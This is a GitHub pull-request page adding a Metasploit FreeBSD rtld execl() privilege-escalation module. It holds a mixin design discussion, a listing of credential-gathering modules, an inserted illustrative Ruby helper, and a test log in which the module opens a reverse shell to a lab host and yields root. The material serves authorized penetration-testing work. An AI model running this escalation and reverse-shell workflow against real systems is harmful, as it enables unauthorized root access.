
Add FreeBSD rtld execl() Privilege Escalation module #11808

Merged
merged 1 commit into from May 20, 2019

4 participants
@bcoles
Contributor

commented May 3, 2019

Add FreeBSD rtld execl() Privilege Escalation module

@bcoles bcoles added module docs labels May 3, 2019

@space-r7 space-r7 self-assigned this May 15, 2019

end
vprint_good "FreeBSD version #{kernel_release} appears vulnerable"

unless command_exists? 'gcc'

@cbrnrd
@bcoles

bcoles May 20, 2019

Author Contributor

It does, but this is a FreeBSD module.

The mixins are a mess, and not something I want to tackle in this PR.

Despite BSD and FreeBSD being treated as different platforms in exploit and payload contexts, there are no BSD or FreeBSD mixins. Instead, the closest match is the Unix mixin, which happens to also import msf/core/post/linux/system.

Importing a mixin for a different platform for a single method (that's 1 line long) didn't seem appropriate. This pollutes the namespace and is more likely to introduce issues if the Linux mixins change in the future.

Similarly, there's a method for the is_root? check in the Linux mixins.

Ideally, the UNIX mixin should be updated to support is_root? and has_gcc?, and remove the dependency on msf/core/post/linux/system. The following modules will also need to be updated. Not something I want to tackle in this PR. I think some of the following are unnecessarily including the Unix mixin, and could instead simply import the Linux mixin.

$ grep -rn Msf::Post::Unix modules/
modules/exploits/linux/local/autostart_persistence.rb:10:  include Msf::Post::Unix
modules/exploits/linux/local/rc_local_persistence.rb:10:  include Msf::Post::Unix
modules/exploits/linux/local/service_persistence.rb:10:  include Msf::Post::Unix
modules/exploits/linux/local/cron_persistence.rb:10:  include Msf::Post::Unix
modules/post/linux/gather/ecryptfs_creds.rb:8:  include Msf::Post::Unix
modules/post/linux/manage/sshkey_persistence.rb:14:  include Msf::Post::Unix
modules/post/linux/manage/pseudo_shell.rb:11:  include Msf::Post::Unix
modules/post/multi/gather/maven_creds.rb:11:  include Msf::Post::Unix
modules/post/multi/gather/lastpass_creds.rb:13:  include Msf::Post::Unix
modules/post/multi/gather/docker_creds.rb:10:  include Msf::Post::Unix
modules/post/multi/gather/rsyncd_creds.rb:8:  include Msf::Post::Unix
modules/post/multi/gather/rubygems_api_key.rb:8:  include Msf::Post::Unix
modules/post/multi/gather/fetchmailrc_creds.rb:8:  include Msf::Post::Unix
modules/post/multi/gather/aws_keys.rb:8:  include Msf::Post::Unix
modules/post/multi/gather/netrc_creds.rb:8:  include Msf::Post::Unix
modules/post/multi/gather/ssh_creds.rb:10:  include Msf::Post::Unix
modules/post/multi/gather/gpg_creds.rb:8:  include Msf::Post::Unix
modules/post/multi/gather/dbvis_enum.rb:12:  include Msf::Post::Unix
modules/post/multi/gather/irssi_creds.rb:8:  include Msf::Post::Unix
modules/post/multi/gather/remmina_creds.rb:8:  include Msf::Post::Unix
modules/post/multi/gather/pgpass_creds.rb:8:  include Msf::Post::Unix
modules/post/multi/manage/dbvis_add_db_admin.rb:10:  include Msf::Post::Unix
modules/post/multi/manage/hsts_eraser.rb:10:  include Msf::Post::Unix
modules/post/multi/manage/dbvis_query.rb:10:  include Msf::Post::Unix
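The two checks discussed above, is_root? and has_gcc?, written as a small platform-neutral mixin built only on cmd_exec, so a FreeBSD module would not need to import the Linux mixins. This is an added illustration, not Metasploit's own code: the method names cmd_exec and command_exists? mirror the real Msf::Post API, but the bodies and the FakeSession stub (a constructed stand-in for a live session) are assumptions made here so the example runs offline.

```ruby
# Added illustration (not Metasploit's code): a Unix-only mixin providing
# is_root? and has_gcc? on top of cmd_exec, with no Linux dependency.
module UnixChecks
  # True when the session's effective uid is 0.
  def is_root?
    cmd_exec('id -u').to_s.strip == '0'
  end

  # True when `cmd` resolves on PATH, using POSIX `command -v` so the
  # same check works on FreeBSD and Linux shells alike.
  def command_exists?(cmd)
    cmd_exec("command -v #{cmd} >/dev/null 2>&1 && echo true").to_s.strip == 'true'
  end

  # Compiler pre-check a module can run before writing any source files.
  def has_gcc?
    command_exists?('gcc')
  end
end

# Constructed stand-in for a session: answers a fixed table of commands.
# A real module would get cmd_exec from Msf::Post::Common instead.
class FakeSession
  include UnixChecks

  def initialize(responses)
    @responses = responses
  end

  # Unknown commands return an empty string, as a failed shell command would.
  def cmd_exec(cmd)
    @responses.fetch(cmd, '')
  end
end

# Sample sessions (constructed): a root shell with gcc, and an unprivileged
# shell without it.
ROOT_WITH_GCC = FakeSession.new(
  'id -u' => "0\n",
  'command -v gcc >/dev/null 2>&1 && echo true' => "true\n"
)
USER_NO_GCC = FakeSession.new('id -u' => "1001\n")

if __FILE__ == $0
  puts "root? #{ROOT_WITH_GCC.is_root?} gcc? #{ROOT_WITH_GCC.has_gcc?}"
  puts "root? #{USER_NO_GCC.is_root?} gcc? #{USER_NO_GCC.has_gcc?}"
end
```

Because every check goes through cmd_exec, the mixin carries no Linux-specific helpers, which is the namespace-pollution concern raised above; swapping FakeSession for a real session object changes nothing in UnixChecks itself.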
@space-r7

Contributor

commented May 20, 2019

Tested on FreeBSD 8.0:

msf5 exploit(multi/ssh/sshexec) > sessions -i 1
[*] Starting interaction with 1...

id
uid=1001(a_user) gid=1001(a_user) groups=1001(a_user),0(wheel)
background

Background session 1? [y/N]  y
msf5 exploit(multi/ssh/sshexec) > use exploit/freebsd/local/rtld_execl_priv_esc 
msf5 exploit(freebsd/local/rtld_execl_priv_esc) > set session 1
session => 1
msf5 exploit(freebsd/local/rtld_execl_priv_esc) > set lhost 172.16.215.1
lhost => 172.16.215.1
msf5 exploit(freebsd/local/rtld_execl_priv_esc) > run

[*] Started reverse TCP handler on 172.16.215.1:4444 
[+] gcc is installed
[*] Writing '/tmp/.Kw5aja.c' (147 bytes) ...
[*] Writing '/tmp/.3jsxsvcw.c' (365 bytes) ...
[*] Writing '/tmp/.tSblgW0' (172 bytes) ...
[*] Launching exploit...
[*] Command shell session 2 opened (172.16.215.1:4444 -> 172.16.215.135:65296) at 2019-05-20 11:52:45 -0500
[+] Deleted /tmp/.Kw5aja.c
[+] Deleted /tmp/.Kw5aja.o
[+] Deleted /tmp/.wAZZN.0
[+] Deleted /tmp/.3jsxsvcw.c
[+] Deleted /tmp/.3jsxsvcw
[+] Deleted /tmp/.tSblgW0

id
uid=0(root) gid=0(wheel) groups=0(wheel)

I modified sshexec to get the low-privileged shell on the FreeBSD target and just noticed you updated sshexec in another PR that adds the proper targets. Thanks for doing that!

The code LGTM, so I'll get this landed soon.

@space-r7 space-r7 merged commit 2ee7517 into rapid7:master May 20, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
Metasploit Automation - Test Execution: Successfully completed all tests.
continuous-integration/travis-ci/pr: The Travis CI build passed

space-r7 added a commit that referenced this pull request May 20, 2019

@bcoles bcoles deleted the bcoles:rtld_execl_priv_esc branch May 20, 2019

@space-r7

Contributor

commented May 20, 2019

Release Notes

This module results in a shell with root privileges in FreeBSD by exploiting a vulnerability in the run-time link-editor (rtld). Exploiting this vulnerability allows for loading arbitrary objects via LD_PRELOAD that can result in privileged code execution.

jmartin-r7 added a commit that referenced this pull request May 20, 2019
